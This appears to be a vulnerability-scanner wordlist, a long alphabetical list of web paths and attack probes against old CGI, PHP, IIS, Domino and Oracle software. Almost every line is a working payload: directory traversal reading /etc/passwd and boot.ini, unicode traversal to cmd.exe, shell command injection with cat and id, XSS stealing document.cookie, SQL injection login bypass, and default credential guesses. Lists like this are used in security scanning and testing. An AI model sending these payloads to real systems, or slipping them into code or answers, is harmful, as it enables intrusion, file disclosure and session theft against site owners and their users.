netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
nethome/
netpad.cgi
netscape/
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
new
new/
news
news/news.mdb
newsdesk.cgi?t=../../../../../../../../../../etc
newsdesk.cgi?t=../../../../../../../../../../etc/passwd
newtopic.php
newuser?Image=../../database/rbsserv.mdb
nikto.ida
nimages.php
nl/
nlog-smb.cgi
nlog-smb.pl
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
node/view/666\"><script>alert(document.domain)</script>
non-existent.pl
noshell
nosuchurl/><script>alert('Vulnerable')</script>
notes.nsf
noticias/
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
nphp/nphpd.php
npn_admn.nsf
npn_rn.nsf
ns-icons/
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
nsn/env.bas
nsn/fdir.bas
nsn/fdir.bas:ShowVolume
ntitar.pl
ntsync4.nsf
ntsync45.nsf
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nul..cfm
nul..dbm
nul.cfm
nul.dbm
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
oc/Search/SQLQHit.asp
oc/Search/sqlqhit.asp
odbc/
oekaki/
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
officescan/cgi/cgiChkMasterPwd.exe
officescan/cgi/jdkRqNotify.exe
officescan/hotdownload/ofscan.ini
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
old/
open?
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
oprocmgr-status
options.inc.php+
options.php?optpage=<script>alert('Vulnerable!')</script>
oracle
oradata/
order/
order/order_log.dat
order/order_log_v12.dat
orders/
orders/checks.txt
orders/mountain.cfg
orders/order_log.dat
orders/order_log_v12.dat
orders/orders.log
orders/orders.txt
oscommerce/default.php
outgoing/
owa_util%2esignature
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
ows-bin/perlidlc.bat?&dir
ows/
ows/restricted%2eshow
pafiledb/includes/team/file.php
page.cgi?../../../../../../../../../../etc/passwd
pagelog.cgi
pages/
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
pals-cgi?palsAction=restart&documentName=/etc/passwd
parse-file
parse_xml.cgi
pass
pass_done.php
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password.inc
password/
passwords.txt
passwords/
path/nw/article.php?id='
pbcgi.cgi?name=Joe%Camel&email=%3C
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/pbserver.dll
pccsmysqladm/incs/dbconnect.inc
pdf/
people.list
perl
perl-status
perl.exe
perl.exe?-v
perl/
perl/-e%20%22system('cat%20/etc/passwd');\%22
perl/-e%20print%20Hello
perl/env.pl
perl/files.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
perl5/
perl5/files.pl
perl?-v
perlshop.cgi
perweb.nsf
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
pfdispaly.cgi?../../../../../../../../../../etc
pfdispaly.cgi?../../../../../../../../../../etc/passwd
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
phf
phf.cgi?QALIA
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
phf?Qname=root%0Acat%20/etc/passwd%20
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/stats.php
photo/
photo/manage.cgi
photo/protected/manage.cgi
photo_album/apa_phpinclude.inc.php
photodata/
photodata/manage.cgi
php-cgi
php-coolfile/action.php?action=edit&file=config.php
php.cgi?/etc/passwd
php.ini
php/
php/gaestebuch/admin/index.php
php/index.php
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
php/php.exe?c:\boot.ini
php/php.exe?c:\winnt\boot.ini
php/php4ts.dll
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB2/includes/db.php
phpBB2/search.php?search_id=1\
phpEventCalendar/file_upload.php
phpMyAdmin/
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpimageview.php?pic=javascript:alert('Vulnerable')
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
phpmyadmin/
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phprocketaddin/?page=../../../../../../../../../../boot.ini
phprocketaddin/?page=../../../../../../../../../../etc/passwd
phpshare/phpshare.php
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
pics/
piranha/secure/passwd.php3
pix/
pks/lookup
pls/admin
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
pls/ldc/admin_/
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/HTP.PRINT
pls/portal/PORTAL.home
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/SELECT
pls/portal/null
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.signature
pls/portal30/admin_/
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plusmail
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pm/lib.inc.php
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pmlite.php
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
poll
pollit/Poll_It_
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
polls
pollssi.cgi
poppassd.php3+
porn/
post-query
post16.exe
post32.exe|dir%20c:\\
post_query
postcards.cgi
postinfo.html
postnuke/html/index.php?module=My_eGallery
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
postnuke/index.php?module=My_eGallery
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
powerup/r.cgi?FILE=../../../../../../../../../../passwd
pp.php?action=login
ppdscgi.exe
pr0n/
prd.i/pgen/
printenv
printenv.tmp
privado/
private.nsf
private/
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
prod/
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
product_info.php
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
profile.cgi
profile.php?u=JUNK(8)
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
project/index.php?m=projects&user_cookie=1
prometheus-all/index.php
pron/
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;
protection.php
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
prueba/
pruebas/
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pt_config.inc
ptg_upgrade_pkg.log
pu3.pl
pub/
pub/english.cgi?op=rmail
public.nsf
public/
publica/
publicar/
publico/
publisher/
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
purchase/
purchases/
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20
pvote/ch_info.php?newpass=password&confirm=password%20
pvote/del.php?pollorder=1%20
pw/
pw/storemgr.pw
pwd.db
python/
qpadmin.nsf
query
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query?mss=%2e%2e/config
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
quickstore.cgi?page=../../../../../../../../../../etc
quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
quikmail/nph-emumail.cgi?type=../%00
quikstore.cfg
quikstore.cgi
quizme.cgi
r.cgi?FILE=../../../../../../../../../../etc
r.cgi?FILE=../../../../../../../../../../etc/passwd
ratlog.cgi
reademail.pl
readme
readme.eml
readme.nsf
readme.txt
readmec.nsf
readmes.nsf
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
redirect
register.cgi
register/
registered/
replicator/webpage.cgi/
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
reports.nsf
reports/
reports/rwservlet
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/showenv
reports/rwservlet/showjobs
reports/rwservlet/showmap
reports/rwservlet/showmap?server=myserver
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
reports/temp/
reseller/
responder.cgi
restricted/
retail/
retrieve_password.pl
reviews/newpro.cgi
rguest.exe
rightfax/fuwww.dll/?
rksh
rmp_query
robadmin.cgi
robpoll.cgi
room/save_item.php
root
root/
rpc.php?q="><script>alert(document.cookie)</script>
rpc.php?q='&t='
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpm_query
rsh
rtm.log
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sales/
sam
sam._
sam.bin
sample/
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
samples/
samples/search.dll?query=<script>alert(document.cookie)</script>
samples/search/queryhit.htm
save/
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
sbcgi/sitebuilder.cgi
sca/menu.jsp
schema50.nsf
scoadminreg.cgi
scozbook/view.php?PG=whatever
scr/
scratch
screen.php
script>alert('Vulnerable')</script>.cfm
scripts
scripts/*%0a.pl
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
scripts/CGImail.exe
scripts/Carello/Carello.dll
scripts/admin.pl
scripts/cfgwiz.exe
scripts/contents.htm
scripts/convert.bas
scripts/counter.exe
scripts/cphost.dll
scripts/cpshost.dll
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/fpadmcgi.exe
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
scripts/httpodbc.dll
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/no-such-file.pl
scripts/postinfo.asp
scripts/proxy/w3proxy.dll
scripts/repost.asp
scripts/root.exe?/c+dir+c:\+/OG
scripts/samples/ctguestb.idc
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/samples/search/webhits.exe
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
scripts/tools/ctss.idc
scripts/tools/dsnform
scripts/tools/dsnform.exe
scripts/tools/getdrvrs.exe
scripts/tools/newdsn.exe
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
scripts/weblog
scripts/wsisa.dll/WService=anything?WSMadmin
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
search.asp?Search=
search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
search.asp?term=<%00script>alert('Vulnerable')</script>
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
search.php?searchfor=\"><script>alert('Vulnerable');</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
search.php?zoom_query=<script>alert(\"hello\")</script>
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
search.pl?form=../../../../../../../../../../etc
search.pl?form=../../../../../../../../../../etc/passwd%00
search.vts
search/
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search/SQLQHit.asp
search/htx/SQLQHit.asp
search/htx/sqlqhit.asp
search/inc/
search/index.cfm?<script>alert(\"Vulnerable\")</script>
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
search/sqlqhit.asp
search97.vts
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
secret.nsf
secret/
secure/
securecontrolpanel/
secured/
securelogin/1,2345,A,00.html
security/web_access.html
sell/
sendform.cgi
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendphoto.php
sendtemp.pl?templ=../../../../../../../../../../etc
sendtemp.pl?templ=../../../../../../../../../../etc/passwd
sensepost.exe?/c+dir
server-info
server-status
server/
server_stats/
servers/link.cgi
service/
services/
servicio/
servicios/
servlet/AdminServlet
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/PrintServlet
servlet/SchedulerTransfer
servlet/SearchServlet
servlet/ServletManager
servlet/SessionManager
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
servlet/allaire.jrun.ssi.SSIFilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.unify.servletexec.UploadServlet
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
servlet/gwmonitor
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlet/sq1cdsn
servlet/sqlcdsn
servlet/sunexamples.BBoardServlet
servlet/webacc
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
servlet/webacc?User.html=noexist
servlet/webpub
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
servlets/SchedulerTransfer
servlets/weboam/oam/oamLogin
session/adminlogin
session/admnlogin
setpasswd.cgi
settings/site.ini
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
setup.nsf
setup/
setupweb.nsf
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
sh
shop.cgi?page=../../../../../../../etc/passwd
shop.pl/page=;cat%20shop.pl|
shop/
shop/auth_data/auth_user_file.txt
shop/database/metacart.mdb
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/orders/orders.txt
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shopa_sessionlist.asp
shopadmin.asp
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
shopdbtest.asp
shopexd.asp?catalogid='42
shoponline/fpdb/shop.mdb
shopper.cgi?newpage=../../../../../../../../../../etc
shopper.cgi?newpage=../../../../../../../../../../etc/passwd
shopper/
shopping/database/metacart.mdb
shopping/diag_dbtest.asp
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
shoutbox.php?conf=../../../../../../../etc/passwd
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
show.pl
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
showcheckins.cgi?person=<script>alert('Vulnerable')</script>
showcheckins.cgi?person=<script>alert('XSS')</script>
showmail.pl
showmail.pl?Folder=<script>alert(document.cookie)</script>
showuser.cgi
shtml.dll
signon
simple/view_page?mv_arg=|cat%20/etc/passwd|
simplebbs/users/users.php
simplestguest.cgi
simplestmail.cgi
sips/sipssys/users/a/admin/user
site/'
site/eg/source.asp
site/iissamples/
site_searcher.cgi
sitemap.xml
siteminder
siteminder/smadmin.html
siteseed/
siteserver/publishing/viewcode.asp?source=/default.asp
smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smbcfg.nsf
smconf.nsf
smency.nsf
smg_Smxcfg30.exe?vcc=3560121183d3
smhelp.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smssend.php
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
soap/servlet/soaprouter
soapConfig.xml
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
software.nsf
software/
soinfo.php?\"><script>alert('Vulnerable')</script>
sojourn.cgi?cat=../../../../../../../../../../etc
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
solaris/
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
source/
spelling.php3+
spin_client.cgi?aaaaaaaa
spwd
sql/
sqldump.sql
sqlnet.log
sqlqhit.asp
squirrelmail/src/read_body.php
src/
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
srchadm
srvinst.nsf
srvnam.htm
srvstatus.chl+
ss
ss.cfg
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
sscd_suncourier.pl
ssdefs/siteseed.dtd
ssi/
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
staff/
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
start.php?config=alper.inc.php
stat.htm
stat.pl
stat/
staticpages/index.php
statistic/
statistics/
statmail.nsf
statrep.nsf
stats-bin-p/reports/index.html
stats.htm
stats.html
stats.pl
stats.prf
stats.txt
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
status.php3
status/
status?full=true
statusconfig.pl
statview.pl
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
store.cgi?
store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
store/
store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
store/agora.cgi?cart_id=<script>alert('XSS')</script>
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../../etc/passwd
story.pl?next=../../../../../../../../../../etc
story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../passwd%00
streg.nsf
stronghold-info
stronghold-status
structure.sql
stsrc.nsf
style/
styles/
stylesheet/
stylesheets/
subir/
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
submit?setoption=q&option=allowed_ips&value=255.255.255.255
sun/
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
super_stats/access_logs
super_stats/error_logs
support/
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
support/messages
supporter/index.php
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/tupdate.php
surf/scwebusers
survey
survey.cgi
sw000.asp?|-|0|404_Object_Not_Found
swf
sws/admin.html
sws/manager.pl
sys/
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
syslog.htm?%20
system/
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
